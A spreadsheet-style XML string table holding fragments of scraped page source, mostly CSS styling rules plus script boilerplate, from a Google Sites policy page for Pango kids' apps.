  <si>
    <t>rgba(33,33,33,1);}.tpmmCb .qnVSj{color: rgba(33,33,33,1);}.tpmmCb .Glwbz{color: rgba(33,33,33,1);}.tpmmCb .qLrapd{color: rgba(33,33,33,1);}.tpmmCb .aHM7ed{color: rgba(33,33,33,1);}.tpmmCb .NHD4Gf{color: rgba(33,33,33,1);}.tpmmCb .IFuOkc:before{background-color: rgba(255,255,255,1); display: block;}.tpmmCb .Wew9ke{fill: rgba(33,33,33,1);}.dhtgD:hover{color: rgba(0,0,0,1);}.dhtgD:active{color: rgba(0,0,0,1);}.Zjiec{color: rgba(0,0,0,1); font-family: Roboto, sans-serif; font-size: 20pt; font-weight: 500; letter-spacing: 1px; padding-bottom: 57px; padding-left: 21.5px; padding-right: 21.5px; padding-top: 8px; text-align: center; text-transform: none;}.XMyrgf{margin-top: 0px; margin-left: 21.5px; margin-bottom: 24px; margin-right: 21.5px; text-align: center;}.TlfmSc{color: rgba(251,208,5,1); font-family: Roboto, sans-serif; font-size: 15pt; font-weight: 500; letter-spacing: 1.5px; text-transform: none;}.Mz8gvb{color: rgba(251,208,5,1);}.zDUgLc{background-color: rgba(255,255,255,1); border-bottom-style: solid; border-bottom-width: 1px; border-color: rgba(204,204,204,1);}.QTKDff.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.YTv4We{color: rgba(0,0,0,1);}.YTv4We:hover:before{background-color: rgba(183,153,81,0.1199999973); display: block;}.YTv4We.chg4Jd:focus:before{border-color: rgba(183,153,81,0.3600000143); display: block;}.eWDljc{background-color: rgba(255,255,255,1);}.eWDljc .hDrhEe{padding-left: 8px;}.ZXW7w{color: rgba(106,106,106,1); opacity: 0.26;}.PsKE7e{color: rgba(106,106,106,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; font-weight: 400;}.lhZOrc{color: rgba(33,33,33,1);}.hDrhEe:hover{color: rgba(33,33,33,1);}.M9vuGd{color: rgba(33,33,33,1); font-weight: 700;}.jgXgSe:hover{color: rgba(33,33,33,1);}.j10yRb:hover{color: rgba(33,33,33,1);}.j10yRb.chg4Jd:focus:before{border-color: rgba(33,33,33,0.3600000143); display: block;}.tCHXDc{color: rgba(106,106,106,1);}.iWs3gf.chg4Jd:focus{background-color: rgba(106,106,106,0.1199999973);}.wgxiMe{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,0.150000006); border-style: solid; border-width: 1px;}.fOU46b .TlfmSc{color: rgba(255,255,255,1);}.fOU46b .KJll8d{background-color: rgba(255,255,255,1);}.fOU46b .Mz8gvb{color: rgba(255,255,255,1);}.fOU46b .Mz8gvb.chg4Jd:focus:before{border-color: rgba(255,255,255,1); display: block;}.fOU46b .qV4dIc{color: rgba(255,255,255,0.8700000048);}.fOU46b .jgXgSe:hover{color: rgba(255,255,255,1);}.fOU46b .M9vuGd{color: rgba(255,255,255,1);}.fOU46b .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,0.1199999973);}.fOU46b .a3ETed .qV4dIc{color: rgba(0,0,0,1);}.fOU46b .a3ETed</t>
  </si>
  <si>
    <t>.TlfmSc{color: rgba(0,0,0,1);}.fOU46b .a3ETed .KJll8d{background-color: rgba(0,0,0,1);}.fOU46b .a3ETed .ZXW7w{color: rgba(0,0,0,1);}.fOU46b .a3ETed .jgXgSe</t>
  </si>
  <si>
    <t>: hover{color: rgba(0,0,0,1); opacity: 0.82;}.fOU46b .a3ETed .Mz8gvb{color: rgba(0,0,0,1);}.fOU46b .a3ETed .tCHXDc{color: rgba(0,0,0,1);}.fOU46b .a3ETed .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}@media</t>
  </si>
  <si>
    <t>only screen and (min-width: 1280px){.XeSM4.b2Iqye.fOU46b .LBrwzc .tCHXDc{color: rgba(255,255,255,0.8700000048);}}.XeSM4.b2Iqye.fOU46b .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.KuNac.b2Iqye.fOU46b .tCHXDc{color: rgba(0,0,0,0.6399999857);}}.KuNac.b2Iqye.fOU46b .iWs3gf.chg4Jd:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.GBy4H .KJll8d{background-color: rgba(255,255,255,1);}.eBSUbc{background-color: rgba(255,255,255,1); color: rgba(33,33,33,0.6999999881);}.BFDQOb:hover{color: rgba(33,33,33,1);}.ImnMyf{background-color: rgba(255,255,255,1); color: rgba(33,33,33,1);}.Vs12Bd{background-color: rgba(255,250,230,1); color: rgba(33,33,33,1);}.S5d9Rd{background-color: rgba(251,208,5,1); color: rgba(0,0,0,1);}.zfr3Q{color: rgba(33,33,33,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; font-weight: 400; line-height: 1.56; margin-top: 16px;}.qnVSj{color: rgba(33,33,33,1);}.Glwbz{color: rgba(33,33,33,1);}.duRjpb{color: rgba(0,0,0,1); font-family: Roboto, sans-serif; font-size: 26pt; font-weight: 700; letter-spacing: 0px; line-height: 1.5; margin-top: 28px; text-transform: none;}.Ap4VC{margin-bottom: -28px;}.qLrapd{color: rgba(0,0,0,1);}.JYVBee{color: rgba(0,0,0,1); font-family: Roboto, sans-serif; font-size: 18pt; font-style: normal; font-weight: 700; line-height: 1.56; margin-top: 20px;}.CobnVe{margin-bottom: -20px;}.aHM7ed{color: rgba(0,0,0,1);}.OmQG5e{color: rgba(0,0,0,1); font-family: Roboto, sans-serif; font-size: 13pt; font-weight: 700; letter-spacing: 1px; line-height: 1.63; margin-top: 18px;}.GV3q8e{margin-bottom: -18px;}.NHD4Gf{color: rgba(0,0,0,1);}.LB7kq .duRjpb{font-size: 45pt; font-style: normal; font-weight: 500; letter-spacing: -0.5px; line-height: 1.26; margin-top: 45px;}.LB7kq .baZpAe .duRjpb{padding-bottom: 18px;}.LB7kq .duRjpb: not(.TYR86d):first-child:before{border-bottom-style: solid; border-bottom-width: 8px; border-color: rgba(251,208,5,1); margin-left: auto; margin-right: auto; width: 100px; display: block;}.LB7kq .JYVBee{font-size: 21pt;}@media only screen and (max-width: 479px){.LB7kq .duRjpb{font-size: 30pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .duRjpb{font-size: 38pt;}}@media only screen and (max-width: 479px){.LB7kq .JYVBee{font-size: 17pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq</t>
  </si>
  <si>
    <t>.JYVBee{font-size: 19pt;}}.O13XJf{height: 310px; padding-bottom: 50px; padding-top: 50px;}@media only screen and (min-width: 480px) and (max-width: 767px){.O13XJf{height: 280px; padding-bottom: 45px; padding-top: 45px;}}@media only screen and (max-width: 479px){.O13XJf{height: 250px; padding-bottom: 40px; padding-top: 40px;}}.SBrW1{height: 480px;}@media only screen and (min-width: 480px) and (max-width: 767px){.SBrW1{height: 480px;}}@media only screen and (max-width: 479px){.SBrW1{height: 400px;}}.Wew9ke{fill: rgba(255,255,255,1);}.gk8rDe{height: 200px; padding-bottom: 40px; padding-top: 60px;}.gk8rDe .zfr3Q{color: rgba(0,0,0,1);}.gk8rDe .duRjpb{color: rgba(0,0,0,1); font-size: 36pt;}.gk8rDe .qLrapd{color: rgba(0,0,0,1);}.gk8rDe .duRjpb:</t>
  </si>
  <si>
    <t>not(.TYR86d):first-child:before{border-bottom-width: 6px; border-color: rgba(0,0,0,1); display: block;}.gk8rDe .JYVBee{color: rgba(33,33,33,1); margin-top: 13px;}.gk8rDe .aHM7ed{color: rgba(33,33,33,1);}.gk8rDe .OmQG5e{color: rgba(33,33,33,1);}.gk8rDe .NHD4Gf{color: rgba(33,33,33,1);}@media only screen and (max-width: 479px){.gk8rDe .duRjpb{font-size: 25pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .duRjpb{font-size: 31pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe{padding-top: 45px;}}@media only screen and (max-width: 479px){.gk8rDe{padding-bottom: 0px; padding-top: 30px;}}.dhtgD{text-decoration: underline;}.JzO0Vc{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,0.150000006); border-right-style: solid; border-right-width: 1px; font-family: Lato, sans-serif; width: 250px;}@media only screen and (min-width: 1280px){.JzO0Vc{padding-top: 62px;}}.TlfmSc{font-family: Roboto, sans-serif; font-size: 15pt; font-weight: 500; letter-spacing: 1.5px; text-transform: none;}.PsKE7e{font-family: 'Open Sans', sans-serif; font-size: 12pt;}.IKA38e{line-height: 1.58;}.hDrhEe{padding-bottom: 8px; padding-top: 8px;}.dhtgD:hover{text-decoration: underline;}.Zjiec:before{border-bottom-style: solid; border-bottom-width: 1px; border-color: rgba(0,0,0,1); margin-bottom: 30px; margin-left: auto; margin-right: auto; width: 212px; display: block;}.rgLkl{background-color: rgba(158,158,158,1);}.zDUgLc{border-bottom-style: solid; border-bottom-width: 1px; border-color: rgba(204,204,204,1); opacity: 1;}.QmpIrf{background-color: rgba(251,208,5,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.xkUom{border-color: rgba(251,208,5,1); color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.xkUom:hover{background-color: rgba(251,208,5,0.1000000015);}.KjwKmc{color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px; line-height: 22px;}.KjwKmc:hover{background-color: rgba(251,208,5,0.1000000015);}.lQAHbd .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.lQAHbd .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.lQAHbd .xkUom</t>
  </si>
  <si>
    <t>: hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.lQAHbd .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .Mt0nFe{border-color: rgba(0,0,0,0.200000003);}.cJgDec .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.cJgDec .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.cJgDec .xkUom:hover{background-color: rgba(255,255,255,0.1000000015);}.cJgDec .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.cJgDec .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.tpmmCb .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.tpmmCb .xkUom{border-color: rgba(251,208,5,1); color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.tpmmCb .xkUom</t>
  </si>
  <si>
    <t>: hover{background-color: rgba(251,208,5,0.1000000015);}.tpmmCb .KjwKmc{color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.tpmmCb .KjwKmc:</t>
  </si>
  <si>
    <t>hover{background-color: rgba(251,208,5,0.1000000015);}.gk8rDe .QmpIrf{background-color: rgba(251,208,5,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.gk8rDe .xkUom{border-color: rgba(251,208,5,1); color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.gk8rDe .xkUom:hover{background-color: rgba(251,208,5,0.1000000015);}.gk8rDe .KjwKmc{color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.gk8rDe .KjwKmc:hover{background-color: rgba(251,208,5,0.1000000015);}.O13XJf .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.O13XJf .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.O13XJf .xkUom:hover{background-color: rgba(255,255,255,0.1000000015);}.O13XJf .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.O13XJf .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.Y4CpGd{font-family: 'Open Sans', sans-serif; font-size: 12pt;}.CMArNe{background-color: rgba(255,250,230,1);}.TMjjoe{font-family: Roboto, sans-serif; font-size: 9pt; line-height: 1.2; margin-top: 0px;}.GBy4H</t>
  </si>
  <si>
    <t>.zDUgLc{border-bottom-width: 0px;}.GBy4H .TlfmSc{color: rgba(255,255,255,0.8700000048);}.GBy4H .Mz8gvb{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.GBy4H .Mz8gvb.chg4Jd:focus:before{border-color: rgba(255,255,255,0.8700000048); display: block;}.GBy4H .tCHXDc{color: rgba(255,255,255,0.8700000048);}.GBy4H .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.GBy4H .wgxiMe{background-color: rgba(0,0,0,1);}.GBy4H .qV4dIc{color: rgba(255,255,255,0.8700000048);}.GBy4H .M9vuGd{color: rgba(255,255,255,0.8700000048);}.GBy4H .Zjiec{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.GBy4H .Zjiec: before{border-color: rgba(255,255,255,0.8700000048); display: block;}.GBy4H .PsKE7e{color: rgba(255,255,255,0.8700000048);}.GBy4H .lhZOrc. PsKE7e{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.GBy4H .aJHbb:hover{color: rgba(255,255,255,1);}.GBy4H .jgXgSe:hover{color: rgba(255,255,255,1);}.GBy4H .M9vuGd:hover{color: rgba(255,255,255,1);}.GBy4H .j10yRb:hover{color: rgba(255,255,255,1);}.GBy4H .eBSUbc{color: rgba(255,255,255,0.8700000048);}.fOU46b .ZXW7w{color: rgba(255,255,255,1);}.fOU46b .GBy4H .zDUgLc{border-bottom-width: 0px; opacity: 1;}.fOU46b .GBy4H</t>
  </si>
  <si>
    <t>.TlfmSc{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .YTv4We{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .YTv4We.chg4Jd:focus:before{border-color: rgba(255,255,255,0.8700000048); display: block;}.fOU46b .GBy4H .Mz8gvb{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .tCHXDc{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.fOU46b .GBy4H .qV4dIc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .M9vuGd{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .Zjiec{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .Zjiec:</t>
  </si>
  <si>
    <t>before{border-color: rgba(255,255,255,0.8700000048); display: block;}.fOU46b .GBy4H .PsKE7e{color :</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .lhZOrc. PsKE7e{color: rgba(255,255,255,1);}.fOU46b .GBy4H .aJHbb :</t>
  </si>
  <si>
    <t>hover{color: rgba(255,255,255,1);}.fOU46b .GBy4H .jgXgSe : hover{color: rgba(255,255,255,1);}.fOU46b .GBy4H</t>
  </si>
  <si>
    <t>.M9vuGd : hover{color: rgba(255,255,255,1);}.fOU46b .LBrwzc .ZXW7w{color: rgba(0,0,0,1);}.fOU46b .LBrwzc</t>
  </si>
  <si>
    <t>.zDUgLc{opacity: 1; border-bottom-style: none;}.fOU46b .LBrwzc .Mz8gvb{color: rgba(33,33,33,1); border-bottom-style: none;}.LBrwzc .TlfmSc{color: rgba(33,33,33,1);}.LBrwzc .YTv4We{color: rgba(33,33,33,1);}.LBrwzc .YTv4We.chg4Jd:focus:before{border-color: rgba(33,33,33,1); display: block;}.LBrwzc .Mz8gvb{color: rgba(33,33,33,1); border-color: rgba(204,204,204,1); border-bottom-style: solid; border-bottom-width: 1px;}.LBrwzc .tCHXDc{color: rgba(106,106,106,1);}.LBrwzc .iWs3gf.chg4Jd:</t>
  </si>
  <si>
    <t>focus{background-color: rgba(106,106,106,0.1199999973);}.LBrwzc .qV4dIc{color: rgba(106,106,106,1);}.LBrwzc .M9vuGd{color: rgba(33,33,33,1);}.LBrwzc .Zjiec{color: rgba(33,33,33,1);}.LBrwzc .Zjiec: before{border-color: rgba(33,33,33,1); display: block;}.LBrwzc .IKA38e{color: rgba(106,106,106,1);}.LBrwzc .lhZOrc.</t>
  </si>
  <si>
    <t>IKA38e{color: rgba(33,33,33,1);}.LBrwzc .eBSUbc{color: rgba(106,106,106,1);}.LBrwzc .hDrhEe:hover{color: rgba(33,33,33,1);}.LBrwzc .jgXgSe:hover{color: rgba(33,33,33,1);}.LBrwzc .M9vuGd:hover{color: rgba(33,33,33,1);}.QcmuFb{padding-left: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200px;}@media only screen and (min-width: 1280px){.yxgWrb{margin-left: 250px;}}@media only screen and (max-width: 479px){.Zjiec{font-size: 16pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Zjiec{font-size: 18pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 14pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.duRjpb{font-size: 20pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.duRjpb{font-size: 23pt;}}@media only screen and (max-width: 479px){.JYVBee{font-size: 15pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.JYVBee{font-size: 17pt;}}@media only screen and (max-width: 479px){.OmQG5e{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.OmQG5e{font-size: 13pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 14pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.TMjjoe{font-size: 9pt;}}@media only screen and (min-width: 480px) and (max-width:</t>
  </si>
  <si>
    <t>767px){.TMjjoe{font-size: 9pt;}}section[id="h.574bec4d7e3a54cb_26"] .IFuOkc:before{opacity: 0.0;}section[id="h.6e401cb7f622b5af_250"] .IFuOkc:before{opacity: 0.4;}&lt;/style&gt;&lt;script nonce="Ykbter4MwCiobFBvpmyl0w"&gt;_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL1Uu_OuUcccHpO2MULHPrMKVnYashjRRdNTeTsiUwl4RElnoJVMWVbQG4cHH0J28J6Gl4Eu",1,"CJmPmOK4pf4CFbnGSgAdAYsFFg",1681340315862933,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747265,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49824153,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50224286,50263472,50291080,50313182,50322323,50347762,50455861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149762371-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[1681340315870,"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nonce="Ykbter4MwCiobFBvpmyl0w"&gt;&lt;/script&gt;&lt;script nonce="Ykbter4MwCiobFBvpmyl0w"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier: Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
&lt;/script&gt;&lt;script</t>
  </si>
  <si>
    <t>nonce="Ykbter4MwCiobFBvpmyl0w"&gt;const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jscontroller="pc62j"</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="10qaNPQDY0ls00vlWxdoWQ"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="10qaNPQDY0ls00vlWxdoWQ"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="10qaNPQDY0ls00vlWxdoWQ"&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1vzQkzLnE_62RHdMTmkU0CJiVHy5-aGmJW25ZZE_n8b5v_nBiX5ptnueDPa6BPJpvb3yuQ","je":1,"sstu":1681340316038680,"si":"CJ3souK4pf4CFZ_HSgAdmj8Dow","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747263,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49823162,49824163,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347762,50455861,50468091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t>
  </si>
  <si>
    <t>css?family=Roboto%3A300%2C400%2C500%2C700%7COpen%20Sans%3A400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="dad201no7FREZgMbF3_Vgg"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="dad201no7FREZgMbF3_Vgg"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Comfortaa%3Ai%2Cbi%2C700%2C300%2C400%2C500&amp;display=swap" rel="stylesheet" nonce="dad201no7FREZgMbF3_Vgg"&gt;&lt;style nonce="dad201no7FREZgMbF3_Vgg"&gt;@media only screen and (max-width: 479px){.Rn3Z1b{font-size: 23.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Rn3Z1b{font-size: 27.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.Rn3Z1b{font-size: 30.0pt;}}@media only screen and (min-width: 1280px){.Rn3Z1b{font-size: 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nonce="dad201no7FREZgMbF3_Vgg"&gt;&lt;script nonce="10qaNPQDY0ls00vlWxdoWQ"&gt;&lt;/script&gt;&lt;title&gt;Pango - apps &amp;amp; games for kids - Policy&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="dad201no7FREZgMbF3_Vgg"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.duRjpb .OUGEr{color: rgba(0,0,0,1);}.JYVBee .OUGEr{color: rgba(0,0,0,1);}.OmQG5e .OUGEr{color: rgba(0,0,0,1);}.iwQgFb{background-color: rgba(211,211,211,1);}.ySLm4c{font-family: 'Open Sans', sans-serif;}.CbiMKe{background-color: rgba(251,208,5,1);}.qeLZfd .zfr3Q{color: rgba(33,33,33,1);}.qeLZfd .qnVSj{color: rgba(33,33,33,1);}.qeLZfd .Glwbz{color: rgba(33,33,33,1);}.qeLZfd .duRjpb{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.qeLZfd .qLrapd{color: rgba(0,0,0,1);}.qeLZfd .JYVBee{color: rgba(0,0,0,1);}.qeLZfd .aHM7ed{color: rgba(0,0,0,1);}.qeLZfd</t>
  </si>
  <si>
    <t>.OmQG5e{color: rgba(0,0,0,1);}.qeLZfd .NHD4Gf{color: rgba(0,0,0,1);}.qeLZfd .aw5Odc{color: rgba(0,0,0,1);}.qeLZfd .dhtgD:hover{color: rgba(0,0,0,1);}.qeLZfd .dhtgD:visited{color: rgba(0,0,0,1);}.qeLZfd .iwQgFb{background-color: rgba(211,206,190,1);}.qeLZfd .OUGEr{color: rgba(33,33,33,1);}.qeLZfd</t>
  </si>
  <si>
    <t>.duRjpb .OUGEr{color :</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.qeLZfd .JYVBee .OUGEr{color: rgba(0,0,0,1);}.qeLZfd .OmQG5e .OUGEr{color: rgba(0,0,0,1);}.qeLZfd:before{background-color: rgba(255,250,230,1); display: block;}.lQAHbd .zfr3Q{color: rgba(0,0,0,1);}.lQAHbd .qnVSj{color: rgba(0,0,0,1);}.lQAHbd .Glwbz{color: rgba(0,0,0,1);}.lQAHbd .duRjpb{color: rgba(0,0,0,1);}.lQAHbd .qLrapd{color: rgba(0,0,0,1);}.lQAHbd .JYVBee{color: rgba(0,0,0,1);}.lQAHbd .aHM7ed{color: rgba(0,0,0,1);}.lQAHbd .OmQG5e{color: rgba(0,0,0,1);}.lQAHbd .NHD4Gf{color: rgba(0,0,0,1);}.lQAHbd .aw5Odc{color: rgba(0,0,0,1);}.lQAHbd .dhtgD:hover{color: rgba(0,0,0,1);}.lQAHbd .dhtgD:visited{color: rgba(0,0,0,1);}.lQAHbd .iwQgFb{background-color: rgba(201,172,34,1);}.lQAHbd .OUGEr{color: rgba(0,0,0,1);}.lQAHbd .duRjpb .OUGEr{color: rgba(0,0,0,1);}.lQAHbd .JYVBee</t>
  </si>
  <si>
    <t>.OUGEr{color: rgba(0,0,0,1);}.lQAHbd .OmQG5e .OUGEr{color: rgba(0,0,0,1);}.lQAHbd .CbiMKe{background-color: rgba(255,255,255,1);}.lQAHbd:before{background-color: rgba(251,208,5,1); display: block;}.cJgDec .zfr3Q{color: rgba(255,255,255,1);}.cJgDec .zfr3Q .OUGEr{color</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.cJgDec .NHD4Gf{color: rgba(255,255,255,1);}.cJgDec .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0; display: block;}.O13XJf{height: 310px; padding-bottom: 50px; padding-top: 50px;}.O13XJf .IFuOkc{background-image: url(https://ssl.gstatic.com/atari/images/aristotle-header-dark.jpg);}.O13XJf .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0.5; display: block;}.O13XJf .zfr3Q{color: rgba(255,255,255,1);}.O13XJf .qnVSj{color:</t>
  </si>
  <si>
    <t>.OUGEr{color : rgba(33,33,33,1);}.tpmmCb .qnVSj{color: rgba(33,33,33,1);}.tpmmCb .Glwbz{color: rgba(33,33,33,1);}.tpmmCb .qLrapd{color: rgba(33,33,33,1);}.tpmmCb .aHM7ed{color: rgba(33,33,33,1);}.tpmmCb .NHD4Gf{color: rgba(33,33,33,1);}.tpmmCb .IFuOkc:before{background-color: rgba(255,255,255,1); display: block;}.tpmmCb .Wew9ke{fill: rgba(33,33,33,1);}.dhtgD:hover{color: rgba(0,0,0,1);}.dhtgD:active{color: rgba(0,0,0,1);}.Zjiec{color: rgba(0,0,0,1); font-family: Roboto, sans-serif; font-size: 20pt; font-weight: 500; letter-spacing: 1px; padding-bottom: 57px; padding-left: 21.5px; padding-right: 21.5px; padding-top: 8px; text-align: center; text-transform: none;}.XMyrgf{margin-top: 0px; margin-left: 21.5px; margin-bottom: 24px; margin-right: 21.5px; text-align: center;}.TlfmSc{color: rgba(251,208,5,1); font-family: Roboto, sans-serif; font-size: 15pt; font-weight: 500; letter-spacing: 1.5px; text-transform: none;}.Mz8gvb{color: rgba(251,208,5,1);}.zDUgLc{background-color: rgba(255,255,255,1); border-bottom-style: solid; border-bottom-width: 1px; border-color: rgba(204,204,204,1);}.QTKDff.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.YTv4We{color: rgba(0,0,0,1);}.YTv4We:hover:before{background-color: rgba(183,153,81,0.1199999973); display: block;}.YTv4We.chg4Jd:focus:before{border-color: rgba(183,153,81,0.3600000143); display: block;}.eWDljc{background-color: rgba(255,255,255,1);}.eWDljc .hDrhEe{padding-left: 8px;}.ZXW7w{color: rgba(106,106,106,1); opacity: 0.26;}.PsKE7e{color: rgba(106,106,106,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; font-weight: 400;}.lhZOrc{color: rgba(33,33,33,1);}.hDrhEe:hover{color: rgba(33,33,33,1);}.M9vuGd{color: rgba(33,33,33,1); font-weight: 700;}.jgXgSe:hover{color: rgba(33,33,33,1);}.j10yRb:hover{color: rgba(33,33,33,1);}.j10yRb.chg4Jd:focus:before{border-color: rgba(33,33,33,0.3600000143); display: block;}.tCHXDc{color: rgba(106,106,106,1);}.iWs3gf.chg4Jd:focus{background-color: rgba(106,106,106,0.1199999973);}.wgxiMe{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,0.150000006); border-style: solid; border-width:</t>
  </si>
  <si>
    <t>1px;}.fOU46b .TlfmSc{color: rgba(255,255,255,1);}.fOU46b .KJll8d{background-color: rgba(255,255,255,1);}.fOU46b .Mz8gvb{color: rgba(255,255,255,1);}.fOU46b .Mz8gvb.chg4Jd:focus:before{border-color: rgba(255,255,255,1); display: block;}.fOU46b .qV4dIc{color: rgba(255,255,255,0.8700000048);}.fOU46b .jgXgSe:hover{color: rgba(255,255,255,1);}.fOU46b .M9vuGd{color: rgba(255,255,255,1);}.fOU46b .tCHXDc{color: rgba(255,255,255,0.8700000048);}.fOU46b .iWs3gf.chg4Jd:focus{background-color:</t>
  </si>
  <si>
    <t>.a3ETed .qV4dIc{color: rgba(0,0,0,1);}.fOU46b .a3ETed .TlfmSc{color: rgba(0,0,0,1);}.fOU46b</t>
  </si>
  <si>
    <t>.a3ETed .KJll8d{background-color: rgba(0,0,0,1);}.fOU46b .a3ETed .ZXW7w{color: rgba(0,0,0,1);}.fOU46b .a3ETed .jgXgSe :</t>
  </si>
  <si>
